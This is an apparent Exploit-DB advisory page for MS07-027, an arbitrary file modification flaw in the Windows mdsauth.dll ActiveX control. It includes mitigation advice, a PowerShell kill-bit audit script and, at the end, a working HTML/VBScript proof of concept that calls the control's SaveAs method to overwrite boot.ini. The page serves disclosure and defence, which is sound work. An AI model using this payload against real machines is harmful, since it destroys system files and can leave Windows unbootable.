Vendor: Windows
By: Andres Tarasco Acuna
CVSS: 7.5 (HIGH)
Arbitrary file modification
CWE: 22
Product Name: Windows
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2007-1746
CPE: a:microsoft:windows
Other Scripts:
Platforms Tested:
2007

MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification

The vulnerability allows an attacker to modify arbitrary files on the system. The proof of concept below is a web page that loads the NMSA Session Description Object control (mdsauth.dll) and calls its SaveAs method to modify the boot.ini file. This vulnerability is documented in Microsoft Security Advisory MS07-027.

Mitigation:

Apply the patch provided by Microsoft in security advisory MS07-027. Restrict access to the vulnerable control or remove it if not required.
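
One way to carry out the "restrict access" step above, as an added example that is not part of the original advisory or proof of concept: audit, and with -Apply set, the Internet Explorer kill bit for the CLSID that appears in the proof of concept on this page. Using the kill bit as the restriction mechanism is an assumption, since the page does not name one; the function names are hypothetical.

```powershell
# Added example (not from the advisory): audit, or with -Apply set, the IE kill bit.
param([switch]$Apply)

# CLSID taken from the OBJECT tag in the PoC on this page.
$Clsid   = '{D4FE6227-1288-11D0-9097-00AA004254A0}'
$KillBit = 0x400                      # kill bit: IE refuses to load the control
$Value   = 'Compatibility Flags'

# Native and 32-bit (WOW6432Node) registry views; skip a view that does not exist.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
) | Where-Object { Test-Path -LiteralPath $_ }

function Get-KillBitState {
    param([string]$Root)
    $key   = Join-Path $Root $Clsid
    $flags = $null
    if (Test-Path -LiteralPath $key) {
        $item = Get-ItemProperty -LiteralPath $key -Name $Value -ErrorAction SilentlyContinue
        if ($item) { $flags = $item.$Value }
    }
    [pscustomobject]@{
        Key    = $key
        Flags  = $flags
        Killed = ($null -ne $flags) -and (($flags -band $KillBit) -eq $KillBit)
    }
}

function Set-KillBit {
    param([string]$Root)
    $key = Join-Path $Root $Clsid
    if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
    # OR the bit in so any other compatibility flags already present are kept.
    $current = (Get-KillBitState -Root $Root).Flags
    $new     = [int]$current -bor $KillBit
    New-ItemProperty -LiteralPath $key -Name $Value -PropertyType DWord -Value $new -Force | Out-Null
}

foreach ($root in $Roots) {
    if ($Apply) { Set-KillBit -Root $root }   # writes to HKLM: needs an elevated session
    Get-KillBitState -Root $root              # report the resulting state per view
}
```

A row with Killed = False means Internet Explorer on that registry view will still instantiate the control if a page requests it.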

Exploit-DB raw data:

<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>

<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> 

</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
 target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
 target.SessionAuthor="Andres Tarasco Acuna"
 target.SessionEmailContact="atarasco_at_gmail.com"
 target.SessionURL="http://www.514.es"
 target.SaveAs "c:\boot.ini"
</script>

</body>
</html>

# milw0rm.com [2007-05-10]